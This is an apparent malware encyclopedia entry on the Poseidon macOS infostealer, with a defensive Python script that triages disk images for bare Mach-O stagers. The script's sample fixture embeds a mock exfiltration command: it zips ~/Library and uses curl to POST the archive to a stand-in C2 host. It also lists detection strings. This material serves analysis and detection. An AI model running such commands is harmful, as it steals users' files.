osx.poseidonstealer

Poseidon Stealer

aka: Rodrigo Stealer

macOS infostealer sold by an individual using the handle Rodrigo4. At the time of writing it is distributed as a disk image that contains a bare Mach-O (no app bundle). When the Mach-O is executed it spawns osascript to run an AppleScript that carries the actual infostealer logic: the script collects the targeted files, packs them into a ZIP archive and uploads the archive to a hardcoded C2 over HTTP.
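The delivery shape described above (a Mach-O sitting loose in a disk image rather than inside a .app bundle, handing off to osascript, zipping files and posting them over HTTP) is something an analyst can check for on a mounted or extracted DMG before running anything. The following is an added example written for this page; it is not code from Malpedia, from the cited reports or from the malware author. It flags Mach-O files that are not inside a .app bundle and reports which heuristic indicator strings appear in them. The indicator list, the file names and the sample tree are assumptions constructed for the demonstration; only the Mach-O magic numbers are real.

```python
"""Triage disk-image contents for a bare Mach-O stager of the kind described above.

Added example, not code from the page, Malpedia, or the malware author. It
implements the file-level check an analyst would run on a mounted or extracted
DMG: find Mach-O files that are not inside a .app bundle, then see whether
their printable strings point at an osascript/AppleScript hand-off, archiving
and an HTTP upload. Indicator strings and the sample tree are assumptions
constructed for the demonstration.
"""
import os
import re
import tempfile

# Mach-O and fat/universal magics as they appear in the first four bytes on disk.
# 0xcafebabe is also the Java .class magic, so a fat match is a hint, not proof.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",  # 32-bit, either byte order
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",  # 64-bit, either byte order
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",  # fat / universal
}

# Assumed heuristic indicators of an osascript-driven stager (not taken from the page).
INDICATORS = (b"osascript", b"do shell script", b"zip", b"curl", b"http://", b"https://")

PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")  # crude `strings`-style extraction


def is_macho(path):
    with open(path, "rb") as fh:
        return fh.read(4) in MACHO_MAGICS


def in_app_bundle(rel_path):
    """True if any directory component is an .app bundle (where a Mach-O is expected)."""
    parts = os.path.normpath(rel_path).split(os.sep)
    return any(part.endswith(".app") for part in parts[:-1])


def indicator_hits(path):
    with open(path, "rb") as fh:
        data = fh.read()
    found = set()
    for chunk in PRINTABLE.findall(data):
        low = chunk.lower()
        found.update(ind.decode() for ind in INDICATORS if ind in low)
    return sorted(found)


def triage(root):
    """Return sorted [(relative_path, indicators)] for Mach-O files outside any .app bundle."""
    suspects = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # DMGs often carry an /Applications symlink; skip links
            rel = os.path.relpath(full, root)
            if is_macho(full) and not in_app_bundle(rel):
                suspects.append((rel, indicator_hits(full)))
    return sorted(suspects)


def build_sample_tree():
    """Constructed stand-in for a mounted DMG; file names and contents are made up."""
    root = tempfile.mkdtemp(prefix="dmg_triage_")

    def put(rel, data):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    # Bare 64-bit Mach-O at the top level whose strings show the osascript hand-off,
    # a zip of user files and an HTTP upload (fake header, only the magic is real).
    put("Installer", b"\xcf\xfa\xed\xfe" + b"\x00" * 28
        + b"/usr/bin/osascript -e 'do shell script \"zip -r /tmp/out.zip ~/Library\"'\x00"
        + b"curl -X POST http://c2.example.invalid/upload -F f=@/tmp/out.zip\x00")
    # Legitimate-looking bundle: a Mach-O under Contents/MacOS is where it belongs.
    put("Example.app/Contents/MacOS/Example", b"\xcf\xfa\xed\xfe" + b"\x00" * 28
        + b"NSApplicationMain\x00osascript\x00")
    put("Example.app/Contents/Info.plist", b"<?xml version=\"1.0\"?><plist/>")
    # Text that mentions osascript but is not executable.
    put("README.txt", b"Run the installer; it uses osascript to prompt for a password.\n")
    return root


if __name__ == "__main__":
    for rel, hits in triage(build_sample_tree()):
        print(f"{rel}: bare Mach-O, indicators={hits}")
```

Against a real image, point `triage()` at the mount point (for example a directory under /Volumes/ after `hdiutil attach -nobrowse -readonly`); a hit is a reason to pull the binary into a sandbox, not a verdict, since a signed installer stub can legitimately be a bare Mach-O and the indicator strings are deliberately broad.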

References

2024-07-11  NCSC Switzerland (NCSC Switzerland): Brief technical analysis of the "Poseidon Stealer" malware
2024-06-27  GovCERT.ch (GovCERT.ch): Poseidon Stealer malspam campaign targeting Swiss macOS users
2024-06-24  Malwarebytes Labs (Jérôme Segura): 'Poseidon' Mac stealer distributed via Google ads

There is no YARA signature yet.